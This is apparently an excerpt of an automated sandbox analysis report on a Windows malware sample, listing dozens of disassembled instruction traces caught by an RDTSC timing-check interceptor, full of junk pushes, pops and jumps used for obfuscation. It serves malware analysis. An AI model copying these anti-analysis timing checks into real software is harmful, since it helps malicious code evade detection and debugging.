                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F01D6 second address: 55F022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d pushfd 0x0000000e jmp 00007F449CEB0740h 0x00000013 add ecx, 2C69DB28h 0x00000019 jmp 00007F449CEB073Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 jmp 00007F449CEB0746h 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F022D second address: 55F024A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F024A second address: 55F02C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F449CEB0747h 0x00000009 xor si, 0F2Eh 0x0000000e jmp 00007F449CEB0749h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F449CEB0747h 0x0000001f xchg eax, edi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F449CEB0742h 0x00000029 adc ax, B708h 0x0000002e jmp 00007F449CEB073Bh 0x00000033 popfd 0x00000034 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F02C9 second address: 55F02D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 movzx esi, dx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F02D4 second address: 55F0340 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F449CEB0747h 0x00000008 adc eax, 3BA37FFEh 0x0000000e jmp 00007F449CEB0749h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test esi, esi 0x00000019 jmp 00007F449CEB073Eh 0x0000001e je 00007F450E7EEA2Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F449CEB0747h 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0340 second address: 55F0346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0346 second address: 55F034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F034A second address: 55F034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F034E second address: 55F03F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F449CEB0747h 0x00000014 je 00007F450E7EE9EDh 0x0000001a jmp 00007F449CEB0746h 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 jmp 00007F449CEB0740h 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a pushad 0x0000002b call 00007F449CEB073Eh 0x00000030 pushad 0x00000031 popad 0x00000032 pop esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F449CEB0747h 0x0000003b xor eax, 4C70E78Eh 0x00000041 jmp 00007F449CEB0749h 0x00000046 popfd 0x00000047 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F03F2 second address: 55F043B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 1C5A6297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test edx, 61000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F449CC63D7Fh 0x00000019 add ecx, 0768C59Eh 0x0000001f jmp 00007F449CC63D89h 0x00000024 popfd 0x00000025 mov ecx, 0EF6ED67h 0x0000002a popad 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F043B second address: 55F046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F450E7EE972h 0x0000000f jmp 00007F449CEB073Eh 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov esi, 54A83C3Fh 0x00000020 popad 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E08DB second address: 55E093A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F449CC63D7Ah 0x00000012 xor cl, 00000038h 0x00000015 jmp 00007F449CC63D7Bh 0x0000001a popfd 0x0000001b movzx eax, dx 0x0000001e popad 0x0000001f push ebx 0x00000020 mov ebx, esi 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b mov dx, si 0x0000002e popad 0x0000002f and esp, FFFFFFF8h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 call 00007F449CC63D7Fh 0x0000003a pop eax 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E093A second address: 55E0969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F449CEB0742h 0x00000008 pop esi 0x00000009 call 00007F449CEB073Bh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop esi 0x00000018 mov ax, bx 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0969 second address: 55E096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E096F second address: 55E0973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0973 second address: 55E0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0977 second address: 55E09F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c call 00007F449CEB073Ah 0x00000011 push eax 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007F449CEB0747h 0x0000001a or ax, 737Eh 0x0000001f jmp 00007F449CEB0749h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b push eax 0x0000002c mov esi, edx 0x0000002e pop edi 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F449CEB0741h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F449CEB073Dh 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E09F4 second address: 55E09FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E09FA second address: 55E0A81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F449CEB0746h 0x00000013 sub ebx, ebx 0x00000015 pushad 0x00000016 mov bl, 43h 0x00000018 popad 0x00000019 test esi, esi 0x0000001b jmp 00007F449CEB0742h 0x00000020 je 00007F450E7F607Eh 0x00000026 pushad 0x00000027 mov ax, E29Dh 0x0000002b popad 0x0000002c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000033 jmp 00007F449CEB073Fh 0x00000038 mov ecx, esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F449CEB0745h 0x00000041 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0A81 second address: 55E0AB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F450E5A9683h 0x0000000f jmp 00007F449CC63D7Eh 0x00000014 test byte ptr [76FB6968h], 00000002h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0AB7 second address: 55E0ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0ABB second address: 55E0ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0ABF second address: 55E0AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0AC5 second address: 55E0AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D7Bh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0AD4 second address: 55E0B45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F450E7F5FF9h 0x00000011 pushad 0x00000012 push esi 0x00000013 push edx 0x00000014 pop eax 0x00000015 pop edx 0x00000016 call 00007F449CEB0744h 0x0000001b pop edx 0x0000001c popad 0x0000001d mov edx, dword ptr [ebp+0Ch] 0x00000020 jmp 00007F449CEB073Ch 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F449CEB0740h 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F449CEB073Eh 0x00000033 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0B45 second address: 55E0B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F449CC63D86h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movzx ecx, di 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0B72 second address: 55E0BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F449CEB073Fh 0x0000000c adc eax, 06C5295Eh 0x00000012 jmp 00007F449CEB0749h 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F449CEB073Ch 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0BB8 second address: 55E0BBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0BBE second address: 55E0C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F449CEB0742h 0x00000012 sbb si, AFB8h 0x00000017 jmp 00007F449CEB073Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F449CEB0748h 0x00000023 sub ecx, 1FFE6A18h 0x00000029 jmp 00007F449CEB073Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0CD0 second address: 55E0CEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ch, B1h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1023FF3 second address: 1023FF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0DFC second address: 55F0E00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E00 second address: 55F0E0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E0F second address: 55F0E15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E15 second address: 55F0E45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F449CEB073Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F449CEB0740h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E45 second address: 55F0E49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0E49 second address: 55F0E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0A6E second address: 55F0A8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 mov cx, 6329h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov edx, eax 0x00000010 mov eax, 434D6F9Dh 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0A8B second address: 55F0A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0A8F second address: 55F0AA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0AA3 second address: 55F0AF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 call 00007F449CEB073Ah 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 mov ecx, ebx 0x00000013 popad 0x00000014 mov ecx, 1B610E2Bh 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007F449CEB073Eh 0x00000021 pop ebp 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushfd 0x00000026 jmp 00007F449CEB073Ch 0x0000002b sbb ecx, 1D1DB4E8h 0x00000031 jmp 00007F449CEB073Bh 0x00000036 popfd 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 567069D second address: 56706A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56706A1 second address: 56706BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56706BE second address: 56706F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 44D2h 0x00000007 jmp 00007F449CC63D83h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F449CC63D85h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56706F4 second address: 56706FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56608AF second address: 56608CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56608CA second address: 5660992 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F449CEB073Ah 0x00000012 or esi, 35FB9F58h 0x00000018 jmp 00007F449CEB073Bh 0x0000001d popfd 0x0000001e pop eax 0x0000001f push ebx 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F449CEB0741h 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d push esi 0x0000002e pushfd 0x0000002f jmp 00007F449CEB0743h 0x00000034 add si, 937Eh 0x00000039 jmp 00007F449CEB0749h 0x0000003e popfd 0x0000003f pop esi 0x00000040 pushfd 0x00000041 jmp 00007F449CEB0741h 0x00000046 sbb ecx, 54D7F5B6h 0x0000004c jmp 00007F449CEB0741h 0x00000051 popfd 0x00000052 popad 0x00000053 pop ebp 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F449CEB073Dh 0x0000005b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660992 second address: 5660998 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660998 second address: 566099C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 56000DB second address: 560015E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F449CC63D82h 0x0000000a and si, 67F8h 0x0000000f jmp 00007F449CC63D7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F449CC63D86h 0x0000001c push eax 0x0000001d jmp 00007F449CC63D7Bh 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushad 0x00000025 mov cx, 7721h 0x00000029 movzx ecx, bx 0x0000002c popad 0x0000002d mov dx, A91Eh 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 jmp 00007F449CC63D85h 0x00000039 pop ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F449CC63D7Dh 0x00000041 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C1F second address: 5660C47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F449CEB0746h 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C47 second address: 5660C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C4D second address: 5660C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C51 second address: 5660C55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660C55 second address: 5660CB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F449CEB0739h 0x0000000d pushad 0x0000000e mov cx, F74Bh 0x00000012 pushad 0x00000013 push esi 0x00000014 pop edx 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b pushad 0x0000001c mov ch, 9Dh 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F449CEB073Dh 0x00000025 adc ch, 00000046h 0x00000028 jmp 00007F449CEB0741h 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F449CEB0743h 0x0000003b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660CB6 second address: 5660CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D84h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660CCE second address: 5660CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660CD2 second address: 5660D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F449CC63D83h 0x00000013 and ah, FFFFFF8Eh 0x00000016 jmp 00007F449CC63D89h 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660D11 second address: 5660D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660D17 second address: 5660D1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660D1B second address: 5660D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660D1F second address: 5660D31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 5660D31 second address: 5660D48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
